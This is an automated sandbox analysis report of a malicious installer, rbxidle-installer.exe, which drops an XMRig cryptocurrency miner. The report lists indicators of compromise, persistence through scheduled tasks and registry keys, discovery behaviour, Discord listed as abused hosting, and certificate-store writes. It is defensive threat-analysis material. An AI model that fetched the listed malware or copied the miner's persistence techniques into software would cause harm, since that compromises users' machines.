xmrig | hxxps://rbxidle[.]com/rbxidle-installer[.]exe?__cf_chl_tk=OCpUeNSmM5k1DefE0VxdjEPBW5IDlh3W[.]Cg9HDKuXVg-1708634756-0[.]0-4221

Analysis

max time kernel
144s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2024 20:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://rbxidle.com/rbxidle-installer.exe?__cf_chl_tk=OCpUeNSmM5k1DefE0VxdjEPBW5IDlh3W.Cg9HDKuXVg-1708634756-0.0-4221

Score

10^/10

xmrig discovery miner persistence

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000600000002330a-1904.dat	family_xmrig
behavioral1/files/0x000600000002330a-1904.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation	RBXIDLE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation	RBXIDLE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation	RBXIDLE.exe

Executes dropped EXE 9 IoCs

pid	Process
2288	rbxidle-installer.exe
3452	rbxidle-installer.tmp
2252	RBXIDLE.exe
3112	RBXIDLE.exe
2816	RBXIDLE.exe
1512	RBXIDLE.exe
5308	RBXIDLE.exe
5100	netmanager.exe
5860	xmrig.exe

Loads dropped DLL 11 IoCs

pid	Process
2252	RBXIDLE.exe
2816	RBXIDLE.exe
1512	RBXIDLE.exe
3112	RBXIDLE.exe
3112	RBXIDLE.exe
3112	RBXIDLE.exe
3112	RBXIDLE.exe
3112	RBXIDLE.exe
3112	RBXIDLE.exe
5308	RBXIDLE.exe
5100	netmanager.exe

Registers COM server for autorun 1 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
179	discord.com
181	discord.com
182	discord.com
237	discord.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4380	schtasks.exe
4948	schtasks.exe
3752	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	netmanager.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	netmanager.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	netmanager.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
6552	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133531083963455159"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2200714112-3788720386-2559682836-1000\{77A02F0E-269C-4CF6-9DCE-9F043424FBD5}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2200714112-3788720386-2559682836-1000\{84D4782F-14B4-4AEE-B456-68DACF20B3ED}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	RBXIDLE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	netmanager.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	RBXIDLE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RBXIDLE.exe
